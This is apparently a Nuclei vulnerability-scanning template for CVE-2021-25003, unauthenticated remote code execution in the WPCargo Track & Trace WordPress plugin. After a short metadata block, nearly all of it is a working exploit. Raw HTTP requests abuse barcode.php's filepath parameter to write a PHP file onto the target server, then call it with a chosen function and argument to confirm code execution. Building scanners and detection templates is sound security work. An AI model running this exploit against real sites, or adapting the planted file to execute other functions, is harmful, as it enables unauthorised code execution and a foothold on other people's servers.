id: CVE-2021-25003 info: name: WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution author: theamanrawat severity: critical description: | WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. reference: - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a - https://wordpress.org/plugins/wpcargo/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25003 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25003 cwe-id: CWE-434 cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:*:*:* epss-score: 0.65102 metadata: max-request: 3 verified: true tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan variables: num: "999999999" http: - raw: - | GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} - | GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1 Host: {{Hostname}} - | POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded 2={{md5(num)}} req-condition: true matchers: - type: dsl dsl: - "status_code_1 != 200" - "status_code_2 == 200" - "status_code_3 == 200" - "contains(body_3, md5(num))" - "contains(body_3, 'PNG')" condition: and # Enhanced by md on 2023/03/21